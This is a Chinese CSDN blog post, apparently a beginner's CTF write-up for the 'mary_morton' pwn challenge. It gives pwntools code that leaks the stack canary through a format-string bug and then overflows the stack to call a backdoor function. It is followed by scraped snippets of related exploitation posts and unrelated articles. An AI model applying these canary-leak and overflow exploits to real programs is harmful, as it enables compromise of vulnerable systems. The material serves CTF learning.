萌新入坑(6)

最新推荐文章于 2023-11-04 10:03:13 发布
最新推荐文章于 2023-11-04 10:03:13 发布
阅读量221 收藏 1
点赞数
分类专栏: 任务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44319142/article/details/89407646
版权

mary_morton(格式化字符串漏洞+栈溢出)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
v3=2时格式化字符串漏洞泄漏canary
canary泄漏

p.sendline("2")
p.sendline("%23$p")
p.recvuntil("0x")
cannary = p.recv(16)
cannary = p64(int("0x"+cannary,16))

栈溢出

p.sendline("1")
payload = "a"*0x88 + cannary + p64(0xdeadbeef) + p64(0x4008de)#写入后门函数地址
p.sendline(payload)
p.interactive()
pwn门学习
sjt670994562的博客
09-05 539
dicd_game seed种子题,需要用到共享C dll函数的ctypes from pwn import * from ctypes import * p=remote("111.198.29.45",33304) libc=cdll.LoadLibrary("libc.so.6") //加载动态链接库 p.recvuntil("me know your name: ") p....
32位/64位程序 利用ROP泄露函数地址
qq_44768749的博客
08-23 727
利用ROP泄露函数地址0x01 32位0x02 64位 0x01 32位 addr = u32(p.recvuntil("\xf7")[-4:]) 0x02 64位 addr = u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00")) 不能保证所有题试用,但绝大部分泄露函数地址的题可以用到
python网络编程调用recv函数完整接收数据的三种方法
weixin_34348805的博客
03-26 250
  最近在使用python进行网络编程开发一个通用的tcpclient测试小工具。在使用socket进行网络编程中,如何判定对端发送一条报文是否接收完成,是进行socket网络开发必须要考虑的一个问题。这里,简要介绍一下判别数据接收接收完成常用的三种方法:   1.基础数据接收法:    使用基础数据接收法时,当与服务socket断开连接时,会接收到空字符串。因此,可以根据此特点,在程序中加...
二进制漏洞之——邪恶的printf
FFy's Blog
06-13 5319
0x00 前言 本文是二进制漏洞相关的系列文章。printf有一些鲜为人知的特性,在为编码提供便利的同时,也引了安全的问题。本文重点描述printf在漏洞利用中的一些用法,在正常的编程中不建议这么用。 0x01 概述 printf系列函数的%$(如:%20$x)格式输出,可泄漏栈内的数据(如模块加载的基址),给攻方提供下一步所必须的信息; prinrf系列函数的%n、%hn格式输出
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 5260
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
lmy050813的博客
11-04 150
我也会在csdn上发布一些自己的见解和一些有趣的项目,当然了也可能会有一些简单算法的理解(因为难的算法我也不会,嘿嘿),也欢迎各位大佬对我的帖子提出建议啦。Hello,csdn区的各位好,我是今年计算机,开始学习C语言。都说c是世界上最好的语言,当然,可能不同的人对“最好”这个词理解各有不同䁖。但不管如何,既然选择了这条路,只能义无反顾地走下去。所以在今后学习各种计算机语言的路上,还望各位大佬多多指教。
1_一图流.pom.wpsonline
11-12
1_一图流.pom.wpsonline
2023年ChatGPT发布后,AI 领域还值得么?
03-27
当然值得!AI 领域是一个发展迅速、前途无量的领域,其中包含了机器学习、深度学习、自然语言处理、计算机视觉等各种分支,它们都有广泛的应用场景...AI 技术的发展将会改变我们的未来,带来的经济增长点和社会发展动
2019XCTF攻防世界之
weixin_44113469的博客
04-06 1699
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
CTF指南(web篇)(21.6.5已更
kingdring的博客
09-27 6161
ps:其实在写这篇指南的时候内心还是十分挣扎的,毕竟大佬太多而我自己太太太太菜,然鹅我也不好拒绝温柔善良的郑童鞋的邀请,因此这篇文章只面向最最最,各位大佬请自行忽略 前言 web在ctf里面占到的比重还是蛮大的,从国内有ctf赛事以来,web就一直是各 路出题人的宠儿,就比如说前段时间的某次分区赛初赛题目构成是7pwn 7web 1re 1misc,虽然在我看来这个题目分配过于偏激且离谱了,但是足以看出web 在ctf中的重要性,线下赛pwn佬可能更加关键,不过web手对于每个队伍都是
攻防世界-Web--NaNNaNNaNNaN-Batman(html乱码脚本处理)
热门推荐
Sea_Sand息禅
04-13 1万+
NaNNaNNaNNaN-Batman 下载文件,内容是这样的: 脚本语言,是html文件,修改后缀用浏览器打开得到: 是一个输框,看来我们要先弄清楚这个文件的代码才行,审计代码可以看到最开始的下划线“_”是一个变量,其内容是一个函数的代码,而最后又是一个eval(_),也就是执行这个函数了,我们把eval改为alert,让程序弹框,得到了源码的非乱码形式: 把得到的代码整理一下就是...
Linux pwn门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2389
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
pwn学习之四
weixin_30312659的博客
07-03 452
本来以为应该能出一两道ctf的pwn了,结果又被sctf打击了一波。 bufoverflow_a 做这题时libc和堆地址都泄露完成了,卡在了unsorted bin attack上,由于delete会清0变量导致无法写,一直没构造出unsorted bin attack,后面根据wp发现只要修改一下free的顺序就行了。 这题的主要功能如下: 正常的堆题模板,1是申请堆,2是删除堆,...
从格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4411
以ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
记第一次解PWN题目
天道酬勤
09-02 569
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器附加该程序 #gdb.att...
堆溢出
weixin_44319142的博客
04-23 3289
原理 堆溢出是指程序向某个堆块中写的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块。 不难发现,堆溢出漏洞发生的基本前提是 1、程序向堆上写数据。 2、写的数据大小没有被良好地控制。 思路主要是 1、覆盖与其物...
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2918
get_shell
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2730
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露的地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
攻防世界门(1)
weixin_44319142的博客
04-07 2559
cgpwn2 首先查看一下 开心的题目,只开了nx嘻嘻嘻嘻嘻嘻嘻 只有hello()函数需要看看 程序里边儿就有system函数可以直接调用哈哈哈哈 不过没有“/bin/sh”的字符串,所以要写进去,要写到bss,怎么写呢,我记得原来只用过read,这里有fgets,点进去看到name是一个全局变量,在bss 利用这个把/bin/sh写进去,然后,利用gets函数覆盖返回地址到syst...
win10卸载重装node
最新发布
01-15
### 如何在 Windows 10 上彻底卸载并重安装 Node.js #### 彻底卸载旧版 Node.js 为了确保旧版本的 Node.js 被完全移除...通常情况下只需双击运行 EXE 文件按提示完成向导即可成功安装版本 Node.js 到本地机器上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值